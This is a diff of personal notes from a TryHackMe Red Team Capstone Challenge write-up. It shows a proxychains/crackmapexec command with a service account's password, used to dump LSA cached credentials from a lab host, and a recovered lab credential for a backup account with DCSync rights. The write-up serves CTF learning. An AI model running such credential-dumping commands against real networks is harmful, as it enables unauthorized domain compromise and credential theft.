7RU7H/CTFs/TryHackMe/Red-Team-Capstone-Challenge/Red-Team-Capstone-Challenge-Helped-Through.md

 And following back along with Al once re-re-re-re-hacked to the same point and improved my Sliver cheatsheet
 ![](svcScanningactuallypwned.png)

-Al with cme flags - Domain Cache Credentials - LSA are cached credentials stored in the registry.
+[Alh4zr3d](https://www.twitch.tv/videos/1829218217) comes in with cme flags - Domain Cache Credentials - LSA are cached credentials stored in the registry.
 If
 ```bash
 # You have local admin
 proxychains4 crackmapexec smb 10.200.117.31 -u 'svcScanning' -p 'Password1!' --lsa
 ```

+This was an awesome moment as it opened a lot for me to do without [Alh4zr3d](https://www.twitch.tv/videos/1829218217)
 ![](cmeserv1lsaof.png)
-See [[Red-Team-Capstone-Challenge-Credentials]], the log from cme was not complete Actual password of
+See [[Red-Team-Capstone-Challenge-Credentials]], the log from `cme` was not complete Actual password of
-- svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G
+- `svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G`

 If you have local administrator access you can decrypt these passwords in the registry, which stored encrypted it is just that we have access to the encryption that it is trivial to decrypt.
 ![](svcbackuphasdcsync-bh.png)